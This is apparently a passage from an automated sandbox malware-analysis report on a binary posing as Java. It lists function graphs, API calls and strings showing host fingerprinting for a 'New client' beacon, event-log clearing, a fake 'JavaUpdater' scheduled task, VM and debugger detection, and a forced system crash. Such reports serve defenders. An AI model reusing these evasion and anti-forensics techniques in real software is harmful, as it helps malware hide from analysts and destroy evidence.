385->387 386->322 389 7ff65e1f4f33 386->389 387->293 388 7ff65e1f4f46-7ff65e1f4f5e 387->388 391 7ff65e1f4f90-7ff65e1f4fdc SysAllocString 388->391 392 7ff65e1f4f60-7ff65e1f4f66 388->392 389->387 391->299 402 7ff65e1f4fe2-7ff65e1f504a VariantInit * 2 call 7ff65e1fd9f0 391->402 393 7ff65e1f4f71-7ff65e1f4f78 392->393 394 7ff65e1f4f68-7ff65e1f4f6e SysFreeString 392->394 395 7ff65e1f4f83-7ff65e1f4f8b call 7ff65e1fda34 393->395 396 7ff65e1f4f7a-7ff65e1f4f7f call 7ff65e1fda34 393->396 394->393 395->391 396->395 405 7ff65e1f507e 402->405 406 7ff65e1f504c-7ff65e1f5076 SysAllocString 402->406 408 7ff65e1f5081-7ff65e1f5088 405->408 406->329 407 7ff65e1f507c 406->407 407->408 409 7ff65e1f508e-7ff65e1f5115 408->409 410 7ff65e1f51a9-7ff65e1f51b3 call 7ff65e1fd830 408->410 414 7ff65e1f5148-7ff65e1f51a0 VariantClear * 3 CoUninitialize 409->414 415 7ff65e1f5117-7ff65e1f511d 409->415 410->288 414->410 416 7ff65e1f511f-7ff65e1f5125 SysFreeString 415->416 417 7ff65e1f5128-7ff65e1f512f 415->417 416->417 419 7ff65e1f5131-7ff65e1f5136 call 7ff65e1fda34 417->419 420 7ff65e1f513a-7ff65e1f5147 call 7ff65e1fda34 417->420 419->420 420->414
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInitString$AllocFree$CreateInitializeInstanceUninitializemalloc
                                        • String ID: Application$Java Platform SE$JavaUpdater$Security$System
                                        • API String ID: 2476186896-3516896312
                                        • Opcode ID: c4336876aa5dd49f438aa50f56fe5437a00529bda7151e768ad878f618675877
                                        • Instruction ID: 0c14d68edbc7e1695dea76f979280c84fcf7b233eac0b447824847803cea583b
                                        • Opcode Fuzzy Hash: c4336876aa5dd49f438aa50f56fe5437a00529bda7151e768ad878f618675877
                                        • Instruction Fuzzy Hash: E6423832A05B858AEF11CF35D9502AD33A0FB99B48F188525EE4DA7B68EF3CD585C350
                                        Function 00007FF65E1F7E10 Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 303libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 428 7ff65e1f7e10-7ff65e1f7e4c call 7ff65e1fe000 431 7ff65e1f7e52-7ff65e1f7ebe call 7ff65e1f34a0 GetUserNameW call 7ff65e1f21a0 428->431 432 7ff65e1f83b8-7ff65e1f83df call 7ff65e1fd9d0 428->432 439 7ff65e1f7ec0-7ff65e1f7ec9 431->439 440 7ff65e1f7ecb-7ff65e1f7f50 call 7ff65e1f2cc0 call 7ff65e1f20b0 call 7ff65e1f34a0 GetComputerNameW call 7ff65e1f21a0 431->440 439->439 439->440 449 7ff65e1f7f52-7ff65e1f7f5b 440->449 450 7ff65e1f7f5d-7ff65e1f8027 call 7ff65e1f2cc0 call 7ff65e1f20b0 call 7ff65e1f34a0 call 7ff65e1f1450 call 7ff65e1f34a0 GetVolumeInformationW 440->450 449->449 449->450 461 7ff65e1f808e-7ff65e1f80a7 450->461 462 7ff65e1f8029-7ff65e1f805f call 7ff65e1f3280 call 7ff65e1f21a0 450->462 463 7ff65e1f80b0-7ff65e1f810a call 7ff65e1f34a0 memset GetVersionExW 461->463 464 7ff65e1f80ab call 7ff65e1f34a0 461->464 476 7ff65e1f8061-7ff65e1f806a 462->476 477 7ff65e1f806c-7ff65e1f808c call 7ff65e1f2cc0 call 7ff65e1f20b0 462->477 470 7ff65e1f8113-7ff65e1f8133 GetModuleHandleW GetProcAddress 463->470 471 7ff65e1f810c-7ff65e1f810e 463->471 464->463 473 7ff65e1f8135-7ff65e1f8137 470->473 474 7ff65e1f8139-7ff65e1f818c call 7ff65e1f1390 470->474 475 7ff65e1f8191-7ff65e1f8193 471->475 473->475 474->475 478 7ff65e1f8195-7ff65e1f81b1 call 7ff65e1f21a0 475->478 479 7ff65e1f81e3-7ff65e1f8205 475->479 476->476 476->477 477->463 492 7ff65e1f81b3-7ff65e1f81bc 478->492 493 7ff65e1f81be-7ff65e1f81e1 call 7ff65e1f2cc0 call 7ff65e1f20b0 478->493 481 7ff65e1f8211-7ff65e1f82e8 call 7ff65e1f34a0 call 7ff65e1f1780 call 7ff65e1f85b0 call 7ff65e1fda68 call 7ff65e1f34a0 call 7ff65e1f70a0 479->481 482 7ff65e1f820c call 7ff65e1f34a0 479->482 508 7ff65e1f82ed-7ff65e1f8303 481->508 482->481 492->492 492->493 493->481 509 7ff65e1f8305-7ff65e1f8310 508->509 510 7ff65e1f8351-7ff65e1f835c 508->510 513 7ff65e1f8342-7ff65e1f834a 509->513 514 7ff65e1f8312-7ff65e1f8326 509->514 511 7ff65e1f835e-7ff65e1f8372 510->511 512 7ff65e1f839d-7ff65e1f83b3 call 7ff65e1f9ea0 510->512 515 7ff65e1f8374-7ff65e1f8387 511->515 516 7ff65e1f8390-7ff65e1f8395 call 7ff65e1fda34 511->516 512->432 513->510 518 7ff65e1f833d call 7ff65e1fda34 514->518 519 7ff65e1f8328-7ff65e1f833b 514->519 515->516 520 7ff65e1f8389-7ff65e1f838f _invalid_parameter_noinfo_noreturn 515->520 516->512 518->513 519->518 519->520 520->516
                                        APIs
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F34D8
                                        • GetUserNameW.ADVAPI32 ref: 00007FF65E1F7E9D
                                          • Part of subcall function 00007FF65E1F21A0: ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z.MSVCP140 ref: 00007FF65E1F21C0
                                          • Part of subcall function 00007FF65E1F21A0: ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z.MSVCP140 ref: 00007FF65E1F2216
                                          • Part of subcall function 00007FF65E1F21A0: ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z.MSVCP140 ref: 00007FF65E1F2232
                                          • Part of subcall function 00007FF65E1F21A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF65E1F2242
                                          • Part of subcall function 00007FF65E1F21A0: ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z.MSVCP140 ref: 00007FF65E1F2251
                                          • Part of subcall function 00007FF65E1F21A0: ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z.MSVCP140 ref: 00007FF65E1F2265
                                        • GetComputerNameW.KERNEL32 ref: 00007FF65E1F7F2E
                                        • GetVolumeInformationW.KERNELBASE ref: 00007FF65E1F801F
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F3579
                                          • Part of subcall function 00007FF65E1F34A0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1F3597
                                        • memset.VCRUNTIME140 ref: 00007FF65E1F80EC
                                        • GetVersionExW.KERNEL32 ref: 00007FF65E1F8102
                                        • GetModuleHandleW.KERNEL32 ref: 00007FF65E1F811A
                                        • GetProcAddress.KERNEL32 ref: 00007FF65E1F812A
                                          • Part of subcall function 00007FF65E1F34A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F3556
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F8389
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Locimp@locale@std@@Name_invalid_parameter_noinfo_noreturnmemmove$??0?$codecvt@_??4?$_Addfac@_AddressBid@locale@std@@ComputerConcurrency::cancel_current_taskD@std@@HandleInformationInit@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@ModuleNew_ProcUserV01@V123@V123@@VersionVfacet@23@_VolumeYarn@memset
                                        • String ID: %08X$Application$C:\$Drives$GetProductInfo$New client$Unknown$Windows %d.%d (Build %d)$ip address$kernel32.dll$local user$product version$serial number$system name
                                        • API String ID: 1900567759-3537065479
                                        • Opcode ID: 5080b76f6441fb5deaf58bdfd11dae4b1887ad35dd40ac654e91d0965d0d4ce7
                                        • Instruction ID: 99ab22116fd59ff2da31853da2113fcfc70ac95369e6f800dc71742cd34cbbe7
                                        • Opcode Fuzzy Hash: 5080b76f6441fb5deaf58bdfd11dae4b1887ad35dd40ac654e91d0965d0d4ce7
                                        • Instruction Fuzzy Hash: 48F18422A146C299EF70DF34C9513E93361FBA5348F885231F65CA6999EF7CD684C390
                                        Function 00007FF65E1F42B0 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 141windownativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 524 7ff65e1f42b0-7ff65e1f42e4 call 7ff65e1f3e00 527 7ff65e1f4320-7ff65e1f4340 GetConsoleWindow ShowWindow SetConsoleCtrlHandler 524->527 528 7ff65e1f42e6-7ff65e1f431a RtlAdjustPrivilege NtRaiseHardError 524->528 529 7ff65e1f44de-7ff65e1f44fb call 7ff65e1f4530 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 527->529 530 7ff65e1f4346-7ff65e1f435a GetConsoleWindow GetSystemMenu 527->530 528->527 535 7ff65e1f4501-7ff65e1f452f call 7ff65e1fd9d0 529->535 532 7ff65e1f435c-7ff65e1f4367 RemoveMenu 530->532 533 7ff65e1f436d-7ff65e1f43ab GetModuleFileNameW GetFileAttributesW SetFileAttributesW 530->533 532->533 533->535 536 7ff65e1f43b1-7ff65e1f43c8 533->536 538 7ff65e1f43d0-7ff65e1f4406 GdiplusStartup call 7ff65e1f47d0 536->538 542 7ff65e1f4412-7ff65e1f443d call 7ff65e1f7e10 CoUninitialize 538->542 543 7ff65e1f4408-7ff65e1f440d call 7ff65e1f4990 538->543 548 7ff65e1f4442-7ff65e1f4453 OpenEventLogW 542->548 543->542 549 7ff65e1f4455-7ff65e1f4463 ClearEventLogW CloseEventLog 548->549 550 7ff65e1f4469-7ff65e1f4478 548->550 549->550 550->548 551 7ff65e1f447a-7ff65e1f4481 550->551 552 7ff65e1f4483 551->552 553 7ff65e1f448a-7ff65e1f4493 551->553 552->553 554 7ff65e1f4495-7ff65e1f44ac 553->554 555 7ff65e1f44c8-7ff65e1f44cf 553->555 557 7ff65e1f44c3 call 7ff65e1fda34 554->557 558 7ff65e1f44ae-7ff65e1f44c1 554->558 555->538 556 7ff65e1f44d5 555->556 556->535 557->555 558->557 559 7ff65e1f44d7-7ff65e1f44dd _invalid_parameter_noinfo_noreturn 558->559 559->529
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$ConsoleEventFileWindow$?good@ios_base@std@@AttributesMenuV01@$??6?$basic_ostream@?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@AdjustClearCloseCtrlErrorGdiplusHandlerHardModuleNameOpenOsfx@?$basic_ostream@PrivilegeRaiseRemoveShowStartupSystemUninitializeV01@@V12@_invalid_parameter_noinfo_noreturn
                                        • String ID: Application$Security$System
                                        • API String ID: 1039291073-2169399579
                                        • Opcode ID: 2202469d28eb256a13a2b8e783f8f6042cd7bca2b1afced6cc134338b03aeeda
                                        • Instruction ID: 7d3fb49b106695e8e883b65edaa9a89731b1c9ca2a65a536775fd3e785ba816e
                                        • Opcode Fuzzy Hash: 2202469d28eb256a13a2b8e783f8f6042cd7bca2b1afced6cc134338b03aeeda
                                        • Instruction Fuzzy Hash: C8618031A08A4281FF20DF24E66476A73A2FFA4784F484431E95DA2AE8EF7CE445C751
                                        Function 00007FF65E1F3EC9 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 84processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_wcsicmpmemset
                                        • String ID: QEMU$Security check failed!$VBox$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 4057197811-609307201
                                        • Opcode ID: c64f5e80e60c7e590fc2e8e59739d82692e68fa2b7077d425abbb35b56314ba8
                                        • Instruction ID: ebf9fca0d3a3ad4c5cc2ac5effc41172ca788f8d8c36615c21b3d456145d57c1
                                        • Opcode Fuzzy Hash: c64f5e80e60c7e590fc2e8e59739d82692e68fa2b7077d425abbb35b56314ba8
                                        • Instruction Fuzzy Hash: C1414221B08A0684FF10DF60EB605B83372BB64798F884532E91EA3698EF3CE509C351
                                        Function 00007FF65E1F3FEA Relevance: 28.1, APIs: 6, Strings: 10, Instructions: 62librarynativeloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Library$FreeProcess$AddressCurrentInformationLoadProcQuery
                                        • String ID: NtQueryInformationProcess$QEMU$VBox$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$ntdll.dll$x32dbg.exe$x64dbg.exe
                                        • API String ID: 3226424356-3571693660
                                        • Opcode ID: d9627f16db0fc1a86dd0f104945a38c67c949dada191655017f2f8b7aff098c4
                                        • Instruction ID: 23dcbccd53e10c36a6100cd8590addf0bfe513d51dd3512ab8b88c6f2314a332
                                        • Opcode Fuzzy Hash: d9627f16db0fc1a86dd0f104945a38c67c949dada191655017f2f8b7aff098c4
                                        • Instruction Fuzzy Hash: 97310325A08B0691FE508F11A724BB93361FF68788F880432E95EA3798EF7DE645C351
                                        Function 00007FF65E1F4130 Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 70registrystringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValuestrstr
                                        • String ID: QEMU$SYSTEM\HardwareConfig\Current\$SystemManufacturer$VMware$Virtual$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 3146380931-3937382361
                                        • Opcode ID: ef39f671da64075728605a1ffdf3e4a340ea3a097cf108c17dc8ed1a93a84ef8
                                        • Instruction ID: 21bfcf2499dec480e0b7b91ff58e9e14ca16a8e0faccf8d8fe6baa47d62b1aa6
                                        • Opcode Fuzzy Hash: ef39f671da64075728605a1ffdf3e4a340ea3a097cf108c17dc8ed1a93a84ef8
                                        • Instruction Fuzzy Hash: AE313432B18A1695FF50CF10E660AA93775FB6474CF880432EA5DA3698EF3CE545C740
                                        Function 00007FF65E1F40AC Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 56registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Close$OpenQueryValue
                                        • String ID: DebugPolicy$QEMU$SYSTEM\CurrentControlSet\Control\CI\Policy$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 1607946009-952540290
                                        • Opcode ID: 25521cfc004ebc257bc61c3e9327480934541754925d5f39829c10b8d7562104
                                        • Instruction ID: 9fe64558595a68360b04cbd7dbb653f77c0860bd08df0753c6303ed2264cf385
                                        • Opcode Fuzzy Hash: 25521cfc004ebc257bc61c3e9327480934541754925d5f39829c10b8d7562104
                                        • Instruction Fuzzy Hash: 3D218576A18A4781FF608F10E620BA93365FB6474CF880432FA5DA3698EF3CE645C751
                                        Function 00007FF65E1F3F89 Relevance: 19.3, APIs: 4, Strings: 7, Instructions: 47COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: PerformanceQuery$CounterV01@$??6?$basic_ostream@D@std@@@std@@FrequencySleepU?$char_traits@V01@@
                                        • String ID: QEMU$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 353636290-478688673
                                        • Opcode ID: b0e68379d2f43bbfd6adcc4404e2dbc32403da636b006cdd8939f56799da900c
                                        • Instruction ID: 75f525d00d68b5bec7d22b2a59848d98747988fe1b4f097b988c7bc778ea8ab1
                                        • Opcode Fuzzy Hash: b0e68379d2f43bbfd6adcc4404e2dbc32403da636b006cdd8939f56799da900c
                                        • Instruction Fuzzy Hash: 16216521A08A4795FF01DF20E6609A97322FF64788F880132E90EB36A4EF3CE546C751
                                        Function 00007FF65E1F4082 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 36COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: V01@$??6?$basic_ostream@CheckCurrentD@std@@@std@@DebuggerPresentProcessRemoteU?$char_traits@V01@@
                                        • String ID: QEMU$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 3386908335-478688673
                                        • Opcode ID: 9cc1c9118efba7c555eab79f76b55be6e403fb393d9724d640f38c7b895dc272
                                        • Instruction ID: dd83402519933d85195905896e38e8197250276cb7fce0f167b13a8b5cc7dd5b
                                        • Opcode Fuzzy Hash: 9cc1c9118efba7c555eab79f76b55be6e403fb393d9724d640f38c7b895dc272
                                        • Instruction Fuzzy Hash: DD11566560894791FF50CF10E620AE93361FB6434CF880432EA1EA3298EF3DEA4AC751
                                        Function 00007FF65E1F1780 Relevance: 31.8, APIs: 11, Strings: 7, Instructions: 275COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 561 7ff65e1f1780-7ff65e1f17fc call 7ff65e1f34a0 GetLogicalDriveStringsA 564 7ff65e1f1bc2-7ff65e1f1bef call 7ff65e1fd9d0 561->564 565 7ff65e1f1802-7ff65e1f1807 561->565 565->564 566 7ff65e1f180d-7ff65e1f18b4 memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ 565->566 568 7ff65e1f1a7c-7ff65e1f1aa6 566->568 569 7ff65e1f18ba 566->569 572 7ff65e1f1aa8-7ff65e1f1ab2 568->572 573 7ff65e1f1ac7-7ff65e1f1aca 568->573 571 7ff65e1f18c0-7ff65e1f1907 call 7ff65e1f34a0 GetDriveTypeA 569->571 583 7ff65e1f1968-7ff65e1f196f 571->583 584 7ff65e1f1909-7ff65e1f190c 571->584 572->573 575 7ff65e1f1ab4-7ff65e1f1ac5 572->575 576 7ff65e1f1aee-7ff65e1f1af3 573->576 577 7ff65e1f1acc-7ff65e1f1ad6 573->577 578 7ff65e1f1af8-7ff65e1f1afb 575->578 576->578 577->576 580 7ff65e1f1ad8-7ff65e1f1aec 577->580 581 7ff65e1f1b11-7ff65e1f1b1c 578->581 582 7ff65e1f1afd-7ff65e1f1b0c call 7ff65e1f30a0 578->582 580->578 587 7ff65e1f1b1e-7ff65e1f1b26 581->587 588 7ff65e1f1b47-7ff65e1f1b4b 581->588 582->581 585 7ff65e1f1975-7ff65e1f19ba call 7ff65e1f30a0 call 7ff65e1f3ac0 * 2 583->585 589 7ff65e1f190e-7ff65e1f1911 584->589 590 7ff65e1f1959-7ff65e1f1966 584->590 616 7ff65e1f19c1-7ff65e1f19c9 585->616 587->588 593 7ff65e1f1b28-7ff65e1f1b42 call 7ff65e1f30a0 587->593 596 7ff65e1f1b84-7ff65e1f1bbc call 7ff65e1f2870 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ 588->596 597 7ff65e1f1b4d-7ff65e1f1b60 588->597 594 7ff65e1f1913-7ff65e1f1916 589->594 595 7ff65e1f194a-7ff65e1f1957 589->595 590->585 593->588 601 7ff65e1f193b-7ff65e1f1948 594->601 602 7ff65e1f1918-7ff65e1f191b 594->602 595->585 596->564 603 7ff65e1f1b62-7ff65e1f1b75 597->603 604 7ff65e1f1b7e-7ff65e1f1b83 call 7ff65e1fda34 597->604 601->585 608 7ff65e1f192c-7ff65e1f1939 602->608 609 7ff65e1f191d-7ff65e1f192a 602->609 603->604 610 7ff65e1f1b77-7ff65e1f1b7d _invalid_parameter_noinfo_noreturn 603->610 604->596 608->585 609->585 610->604 616->616 617 7ff65e1f19cb-7ff65e1f19dc 616->617 618 7ff65e1f19de-7ff65e1f19f0 617->618 619 7ff65e1f1a0c-7ff65e1f1a23 617->619 620 7ff65e1f19f2-7ff65e1f1a05 618->620 621 7ff65e1f1a07 call 7ff65e1fda34 618->621 622 7ff65e1f1a25-7ff65e1f1a37 619->622 623 7ff65e1f1a53-7ff65e1f1a57 619->623 620->621 628 7ff65e1f1a67-7ff65e1f1a6d _invalid_parameter_noinfo_noreturn 620->628 621->619 624 7ff65e1f1a4e call 7ff65e1fda34 622->624 625 7ff65e1f1a39-7ff65e1f1a4c 622->625 626 7ff65e1f1a75-7ff65e1f1a78 623->626 627 7ff65e1f1a59-7ff65e1f1a62 call 7ff65e1f32e0 623->627 624->623 625->624 630 7ff65e1f1a6e-7ff65e1f1a74 _invalid_parameter_noinfo_noreturn 625->630 626->568 627->571 628->630 630->626
                                        APIs
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F34D8
                                        • GetLogicalDriveStringsA.KERNEL32 ref: 00007FF65E1F17F4
                                        • memset.VCRUNTIME140 ref: 00007FF65E1F1819
                                        • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF65E1F1838
                                        • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF65E1F1852
                                        • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF65E1F1883
                                        • GetDriveTypeA.KERNELBASE ref: 00007FF65E1F18FE
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F1A67
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F1A6E
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F1B77
                                        • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF65E1F1BB2
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF65E1F1BBC
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F3579
                                        Strings
                                        Memory Dump Source
